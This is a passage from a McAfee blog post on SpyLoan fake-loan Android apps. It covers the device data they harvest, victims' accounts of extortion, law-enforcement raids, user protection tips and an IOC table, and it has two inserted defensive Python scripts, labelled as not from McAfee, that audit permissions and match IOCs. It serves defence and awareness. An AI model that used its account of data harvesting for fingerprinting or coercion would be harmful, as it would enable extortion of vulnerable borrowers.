        • System configuration (bootloader version, build host, build user, CPU info)
        • Network (radio version, system type, build tags)
      • Storage Information:
        • External storage: path, size
        • Internal storage: total size, available size
        • Memory information: total RAM, available RAM
      • Sensor data

    Data from sensors such as accelerometers, gyroscopes, magnetometers if available on the affected device. This information includes:

    • Sensor type, sensor name, version, vendor, maximum range, minimum delay, power consumption, resolution.

    Sensor data can be used for device fingerprinting and user’s behavioral monitoring.

    • Battery Information:
      • Battery level
      • Battery status: Indicates whether the device is plugged in
      • Other battery metadata: health, if present, voltage, battery technology, type, etc.
    • Audio settings (maximum and current volume levels)

    Victim Experiences

    Users have reported alarming experiences, such as:

    • Receiving threatening calls and death threats for delayed payments.
    • Having personal photos and IDs misused to intimidate them.
    • The app accesses their contacts to send harassing messages to friends and family.

    Typical comments on fake loan apps:

    For example, “Préstamo Seguro-Rápido, Seguro” had many fake positive reviews on Google Play alongside a few consistent user reviews alleging abuse of the collected data, extortion and harassment.

     

    Figure 7: User reviews in Spanish

     

    October 18, 2024

    I do not recommend this app. They start calling and threatening you with edited photos and posting them on social media, even sending them to your contacts, a day before. Even when it’s not the due date. Not recommended at all! Pure fraud and extortion.

    September 25, 2024

    Horrible app, they don’t show you how much interest they will charge, which is a lot, and before the payment date arrives, they start threatening your contacts and even send you personal messages with threats and foul language, threatening to extort your family.

    Meanwhile other apps receive similar negative comments:

    Figure 8: Comments on SpyLoan apps

    Global Impact of SpyLoans Apps

    Worldwide Issue with Local Variations

    Figure 9: Global prevalence of SpyLoan apps

    These threats are not confined to a single region; they have been reported globally with localized adaptations. Predatory loan app activity has been identified worldwide, beyond the variants technically described in this post; the following incidents provide wider context on the impact of this threat:

    • Asia:
      • India: Users faced harassment and data leaks from apps misusing granted permissions. Authorities have taken action against such apps.
      • Southeast Asia: Countries like Thailand, Indonesia, Vietnam and the Philippines have reported significant issues with these apps exploiting users’ financial vulnerabilities.
    • Africa:
      • Nigeria, Kenya, Uganda: Similar apps have led to financial fraud and unauthorized transactions, targeting a large unbanked population.
    • Latin America:

    Ranking of the top 10 countries with the highest prevalence of fake loan apps according to McAfee telemetry, Q3 2024:

    • India
    • Mexico
    • Philippines
    • Indonesia
    • Thailand
    • Kenya
    • Colombia
    • Vietnam
    • Chile
    • Nigeria

    Law Enforcement Actions

    According to a report by the Judiciary of Peru, authorities conducted a major raid on a call center engaged in extortion and the operation of fake loan apps targeting individuals in Peru, Mexico, and Chile. 

    The police reported that over 300 individuals were linked to this criminal operation, which had defrauded at least 7,000 victims across multiple countries. 

    The call center employees were trained specifically to extort victims. Using information collected from the SpyLoan apps, they threatened users to extract as much money as possible by imposing inflated interest rates and additional fees. 

    Meanwhile, in Chile, the Commission for the Financial Market (CMF) highlights on its website tens of fraudulent credit applications that have been distributed on Google Play, and the National Consumer Service (SERNAC) reports more cases.

    In May 2024, Chilean police detained over 25 people linked to one fake loan operation that had scammed over 2,000 victims, according to La Tercera.

    Despite these efforts, the activity of these malware applications continues and is increasing in South America and the rest of the world.

    Conclusion

    The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. These apps leverage social engineering to bypass technical security measures and inflict significant harm on individuals. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to run these fraud schemes, especially in South America, Southeast Asia and Africa.

    SpyLoan apps operate with similar code at the app and C2 level across different continents, which suggests the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.

    By reusing code and tactics, they can efficiently target different countries, often evading detection by authorities and creating a widespread problem that is difficult to combat. This networked approach not only increases the scale of the threat but also complicates efforts to trace and shut down these operations, as they can easily adapt and relocate their operations to new regions.

    By understanding how these malicious apps operate and taking proactive steps to protect ourselves, we can mitigate the risks and help others do the same.

    How To Protect Yourself: Tips and Recommendations

    Be Cautious with Permissions

    • Review Permissions Carefully: Be wary of apps requesting permissions that seem unnecessary for their function.
    • Limit Permissions: Deny permissions that are not essential.
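The permission review above can be done offline before installing an app. The following script is an added example, not part of the McAfee post or any McAfee tool: it parses the `uses-permission` lines printed by `aapt dump permissions app.apk` (the line format is assumed from the Android build tools; both the `name='…'` and bare-name forms are accepted) and flags the permissions that give a loan app access to the data this post describes being abused (contacts used to message friends and family, photos and IDs used for intimidation). Which permissions count as unnecessary for a loan app is the editor's judgement, and the sample dump is constructed.

```python
"""Flag permissions a loan app has no business requesting.

Added example, not from the McAfee post. Input is the text printed by
`aapt dump permissions app.apk` (format assumed); SAMPLE_DUMP is constructed.
"""
import re

# Permission -> what it exposes. The choice of "sensitive for a loan app" is an
# assumption based on the abuse described in the post (contacts, photos, IDs).
SENSITIVE_FOR_LOAN_APP = {
    "android.permission.READ_CONTACTS": "contact list (used to harass friends and family)",
    "android.permission.READ_EXTERNAL_STORAGE": "photos and documents on shared storage",
    "android.permission.READ_MEDIA_IMAGES": "photos (Android 13+ scoped media)",
    "android.permission.CAMERA": "camera",
    "android.permission.READ_SMS": "SMS content",
    "android.permission.READ_CALL_LOG": "call history",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
    "android.permission.RECORD_AUDIO": "microphone",
}

# Matches "uses-permission: name='X'" and the older "uses-permission: X" form.
USES_PERM = re.compile(
    r"^uses-permission(?:-sdk-23)?:\s*(?:name=')?([A-Za-z0-9_.]+)'?"
)


def parse_aapt_permissions(dump: str) -> list[str]:
    """Return the permission names declared in an aapt permissions dump, in order."""
    perms = []
    for line in dump.splitlines():
        m = USES_PERM.match(line.strip())
        if m:
            perms.append(m.group(1))
    return perms


def audit_loan_app(perms: list[str]) -> dict[str, str]:
    """Map each requested permission that a loan app should not need to what it exposes."""
    return {p: SENSITIVE_FOR_LOAN_APP[p] for p in perms if p in SENSITIVE_FOR_LOAN_APP}


# Constructed sample output; the package name is a placeholder, not a real app.
SAMPLE_DUMP = """package: com.example.fakeloan
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.READ_EXTERNAL_STORAGE'
uses-permission: name='android.permission.CAMERA'
"""

if __name__ == "__main__":
    findings = audit_loan_app(parse_aapt_permissions(SAMPLE_DUMP))
    for perm, exposure in findings.items():
        print(f"unnecessary for a loan app: {perm} -> {exposure}")
    if findings:
        print("Recommendation: do not install, or deny these permissions at runtime.")
```

Run it against a real APK with `aapt dump permissions app.apk | python3 audit.py` after swapping `SAMPLE_DUMP` for `sys.stdin.read()`; a loan app that asks for contacts, storage or camera is exactly the pattern the tips above warn about.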

    Verify App Legitimacy

    • License and Registration: Ensure the institution is registered and licensed to operate in your country. Verify with your financial regulator’s authority or consumer protection agency.
    • Read User Reviews: Look for patterns of complaints about fraud or data misuse, and pay special attention to apps with polarized reviews, which may contain fake positive reviews.
    • Research the Developer: Look up the developer’s name, website, and reviews. Even if the app includes a privacy policy, which is mandatory on Google Play, scammers may not honor it.

    Use Security Measures

    • Install Security Software: Use reputable antivirus and anti-malware apps.
    • Keep Your Device Updated: Regular updates can protect against vulnerabilities.

    Practice Safe Online Behavior

    • Don’t Share Sensitive Information: Provide personal data only to trusted and verified entities.
    • Be Skeptical of Unrealistic Offers: If it sounds too good to be true, it probably is.

    Report Suspicious Activity

    • Notify App Stores: Report fraudulent apps to help protect others.
    • Contact Authorities: If you’re a victim, report the incident to local law enforcement or cybercrime units.

    IOC

    | Package | App Name | Downloads | Country | SHA256 |
    |---|---|---|---|---|
    | com.prestamoseguro.ss | Préstamo Seguro-Rápido, seguro | 1M | Mexico | f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c |
    | com.voscp.rapido | Préstamo Rápido-Credit Easy | 1M | Colombia | 22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22 |
    | com.uang.belanja | ได้บาทง่ายๆ-สินเชื่อด่วน | 1M | Senegal | b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451 |
    | com.rupiahkilat.best | RupiahKilat-Dana cair | 1M | Senegal | 9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e |
    | com.gotoloan.cash | ยืมอย่างมีความสุข – เงินกู้ | 1M | Thailand | 852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12 |
    | com.hm.happy.money | เงินมีความสุข – สินเชื่อด่วน | 1M | Thailand | 43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee |
    | com.kreditku.kuindo | KreditKu-Uang Online | 500K | Indonesia | dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625 |
    | com.winner.rupiahcl | Dana Kilat-Pinjaman kecil | 500K | Indonesia | b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1 |
    | com.vay.cashloan.cash | Cash Loan-Vay tiền | 100K | Vietnam | e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b |
    | com.restrict.bright.cowboy | RapidFinance | 100K | Tanzania | e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c |
    | com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret | PrêtPourVous | 100K | Senegal | 453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e |
    | com.huaynamoney.prestamos.creditos.peru.loan.credit | Huayna Money – Préstamo Rápido | 100K | Peru | ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc |
    | com.credito.iprestamos.dinero.en.linea.chile | IPréstamos: Rápido Crédito | 100K | Chile | 45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2 |
    | com.conseguir.sol.pe | ConseguirSol-Dinero Rápido | 100K | Peru | 79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48 |
    | com.pret.loan.ligne.personnel | ÉcoPrêt Prêt En Ligne | 50K | Thailand | 27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e |
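To turn the IOC table into a check a responder can actually run, here is an added example (not McAfee's tooling, and not code from the post). It embeds the package names and APK hashes from the table above, parses the `package:<name>` lines that `adb shell pm list packages` prints, and looks up both installed package names and the SHA-256 of an APK pulled with `adb pull`. The `pm list packages` output and the hash used in the demo at the bottom are constructed sample inputs.

```python
"""Check an Android device or a pulled APK against the SpyLoan IOC list.

Added example (not McAfee's tooling). IOC rows are copied from the table
above; the `pm list packages` output in the demo is constructed.
"""
import hashlib

# Package name -> (app name, SHA-256 of the APK), copied from the IOC table.
SPYLOAN_IOCS = {
    "com.prestamoseguro.ss": ("Préstamo Seguro-Rápido, seguro",
        "f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c"),
    "com.voscp.rapido": ("Préstamo Rápido-Credit Easy",
        "22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22"),
    "com.uang.belanja": ("ได้บาทง่ายๆ-สินเชื่อด่วน",
        "b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451"),
    "com.rupiahkilat.best": ("RupiahKilat-Dana cair",
        "9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e"),
    "com.gotoloan.cash": ("ยืมอย่างมีความสุข – เงินกู้",
        "852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12"),
    "com.hm.happy.money": ("เงินมีความสุข – สินเชื่อด่วน",
        "43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee"),
    "com.kreditku.kuindo": ("KreditKu-Uang Online",
        "dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625"),
    "com.winner.rupiahcl": ("Dana Kilat-Pinjaman kecil",
        "b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1"),
    "com.vay.cashloan.cash": ("Cash Loan-Vay tiền",
        "e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b"),
    "com.restrict.bright.cowboy": ("RapidFinance",
        "e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c"),
    "com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret": ("PrêtPourVous",
        "453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e"),
    "com.huaynamoney.prestamos.creditos.peru.loan.credit": ("Huayna Money – Préstamo Rápido",
        "ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc"),
    "com.credito.iprestamos.dinero.en.linea.chile": ("IPréstamos: Rápido Crédito",
        "45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2"),
    "com.conseguir.sol.pe": ("ConseguirSol-Dinero Rápido",
        "79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48"),
    "com.pret.loan.ligne.personnel": ("ÉcoPrêt Prêt En Ligne",
        "27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e"),
}

# Reverse index for hash lookups; keys are lowercase so input case does not matter.
HASH_TO_PACKAGE = {sha.lower(): pkg for pkg, (_, sha) in SPYLOAN_IOCS.items()}


def parse_pm_list(output: str) -> list[str]:
    """Parse `adb shell pm list packages` output: one 'package:<name>' per line."""
    packages = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            packages.append(line[len("package:"):])
    return packages


def match_packages(installed: list[str]) -> list[tuple[str, str]]:
    """Return (package, app name) for every installed package on the IOC list."""
    return [(pkg, SPYLOAN_IOCS[pkg][0]) for pkg in installed if pkg in SPYLOAN_IOCS]


def match_hash(sha256_hex: str):
    """Return the IOC package whose APK hash matches, or None if unknown."""
    return HASH_TO_PACKAGE.get(sha256_hex.strip().lower())


def sha256_file(path: str) -> str:
    """Hash an APK pulled with `adb pull`, reading in chunks so large files are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


if __name__ == "__main__":
    # Constructed sample: a clean browser plus one package from the IOC table.
    sample = "package:com.android.chrome\npackage:com.kreditku.kuindo\n"
    for pkg, name in match_packages(parse_pm_list(sample)):
        print(f"IOC hit: {pkg} ({name}) - uninstall it and report the app store listing")
    # Hash lookups are case-insensitive, so an uppercase digest from another tool still matches.
    print(match_hash("DFBF0BF821FA586D4E58035ED8768D2B0F1226A3B544E5F9190746B6108DE625"))
```

A package-name match is the cheap first pass; a hash match via `sha256_file()` on a pulled APK confirms the exact build in the table, since a repackaged variant with the same package name will not hash-match and should be treated as a new sample rather than a miss.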


    The post SpyLoan: A Global Threat Exploiting Social Engineering appeared first on McAfee Blog.
